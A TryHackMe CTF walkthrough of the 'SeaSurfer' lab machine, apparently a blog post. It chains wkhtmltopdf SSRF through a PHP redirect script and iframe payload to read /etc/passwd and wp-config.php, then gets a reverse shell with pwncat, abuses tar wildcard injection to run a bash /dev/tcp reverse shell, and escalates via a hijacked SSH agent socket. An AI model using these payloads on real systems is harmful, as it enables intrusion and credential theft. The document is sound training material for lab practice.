[THM] : SeaSurfer Walkthrough
Initial Recon:
# Nmap 7.92 scan initiated Fri Jan 27 09:26:09 2023 as: nmap -A -p - -T4 -v -oN init.txt 10.10.48.220
Nmap scan report for 10.10.48.220
Host is up (0.43s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 87:e3:d4:32:cd:51:d2:96:70:ef:5f:48:22:50:ab:67 (RSA)
| 256 27:d1:37:b0:c5:3c:b5:81:6a:7c:36:8a:2b:63:9a:b9 (ECDSA)
|_ 256 7f:13:1b:cf:e6:45:51:b9:09:43:9a:23:2f:50:3c:94 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/27%OT=22%CT=1%CU=33017%PV=Y%DS=4%DC=T%G=Y%TM=63D348F
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
OS:(R=Y%DF=Y%T=40%W=F507%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Uptime guess: 14.339 days (since Fri Jan 13 01:22:22 2023)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 170.11 ms 10.4.0.1
2 ... 3
4 428.18 ms 10.10.48.220
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 27 09:30:54 2023 -- 1 IP address (1 host up) scanned in 285.58 secondsWe can see that port 22 and 80 is open. I intercepted the request in burp and found a virtual host in the header of the response and added to /etc/hosts file.
I tried directory enumeration on the discovered virtual host and found a /adminer directory.
Upon surfing the website, I discovered another virtual host intrenal.seasurfer.thm. However it seemed like internal.seasurfer.thm. I added the host to my /etc/hosts file and got an internal dashboard.
The application allowed user to generate PDF file entering some values. I tried to inject some HTML content and I found that it was rendering the input.
<script>document.write('test')</script>
I tried reading the /etc/passwd file but didn’t worked. I dowloaded the pdf file & tried to see the metadata content of the generated pdf file and enumerated the application version used.
exiftool 27012023-Wp17CyDi97WTA9oWNHwp.pdf
ExifTool Version Number : 12.16
File Name : 27012023-Wp17CyDi97WTA9oWNHwp.pdf
Directory : .
File Size : 52 KiB
File Modification Date/Time : 2023:01:27 09:49:44+05:45
File Access Date/Time : 2023:01:27 09:49:44+05:45
File Inode Change Date/Time : 2023:01:27 09:49:44+05:45
File Permissions : rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Title : Receipt
Creator : wkhtmltopdf 0.12.5
Producer : Qt 4.8.7
Create Date : 2023:01:27 04:13:54Z
Page Count : 1Upon, researching I found that wkhtmltopdf 0.12.5 was vulnerable to SSRF. I came across this article and hosted a php script with following content.
<?php
$loc = "http://127.0.0.1/";
if(isset($_GET['a'])){
$loc = $_GET['a'];
}
header('Location: '.$loc);
?><iframe height=800px width=500px src="http://10.4.13.245:2224/lfi.php?a=file:///etc/passwd">
Then, I fetched the wp-config.php file that was located on “/var/www/wordpress”
The file contained the database username and password. I tired logging in on the adminer directory we found earlier and successfully logged in.
The database contained the hashed password for the wordpress user kyle.
First, I cracked the hash using hashcat , logged in as Wordpress user kyle and got a reverse shell.
pwncat -l <port> --self-inject /bin/sh:<attackerip>:<port>
The /var/www/internal directory containeda script backup.sh.
$ cat backup.sh
#!/bin/bash
# Brandon complained about losing _one_ receipt when we had 5 minutes of downtime, set this to run every minute now >:D
# Still need to come up with a better backup system, perhaps a cloud provider?
cd /var/www/internal/invoices
tar -zcf /home/kyle/backups/invoices.tgz *The script does backup of /var/www/internal/invoices in file invoices.tgz. I found that the above script is vulnerable to tar wildcard injection.
To understand wildcard injection, lets create 2 files “test.txt” and “ — help” and execute “cat — help”. Here, instead of reading the content of “ — help” the help of cat command executes. We will do the same thing with tar command. However if we execute ‘cat — “— help”’ we can read the content of — help.
tar -zcf /home/kyle/backups/invoices.tgz *Here, we can break the tar command to following.
tar -zcf /home/kyle/backups/invoices.tgz --checkpoint=1 --checkpoint-action=exec id>test.txtFor the above command to execute we will create files “ — checkpoint=1” and “ — checkpoint-action=exec id>test.txt”. Whenever, the tar command executes it first reaches checkpoint=1 and then it executes id command and saves files as test.txt. Since, wildcard is preset in the backup.sh tar script the above command will execute as kyle.
To get a reverse shell as kyle I created a file “shell.sh” and “ — checkpoint-action=exec=”bash shell.sh””.
Content of shell.sh
bash -c "bash -i >& /dev/tcp/10.4.13.245/5555 0>&1"
After getting a reverse shell as kyle, I stablized the shell by generating a key with ssh-keygen and copied my public key to authorized_keys file under /home/kyle/.shh/authorized_keys.
chmod 600 id_rsa
ssh -i id_rsa kyle@10.10.94.172I downloaded linpeas.sh and checked for interesting stuffs and found /etc/pam.d/sudo.
#%PAM-1.0
auth sufficient pam_ssh_agent_auth.so file=/etc/ssh/sudo_authorized_keys
session required pam_env.so readenv=1 user_readenv=0
session required pam_env.so readenv=1 envfile=/etc/default/locale user_readenv=0
@include common-auth
@include common-account
@include common-session-noninteractiveWe can see that kyle has sshed into his machine nd ran sudo command.
We now set the environment variable SSH_AUTH_SOCK to the location of a temporary file used by the ssh-agent program, which holds private keys for public-key authentication. ssh sessions can also be seen through the /tmp directory.
export SSH_AUTH_SOCK=/tmp/ssh-A3uEXRGibW/agent.1149By setting the environment variable SSH_AUTH_SOCK to the location of the temporary file used by the ssh-agent program, we can use the command ssh-add -l to authorize a session to run commands with superuser privileges (sudo).
ssh add -l
![[THM] : Badbyte Walkthrough](https://miro.medium.com/v2/resize:fit:679/1*v6EhuCQYdZsjYIrZ4TlgGQ.png)
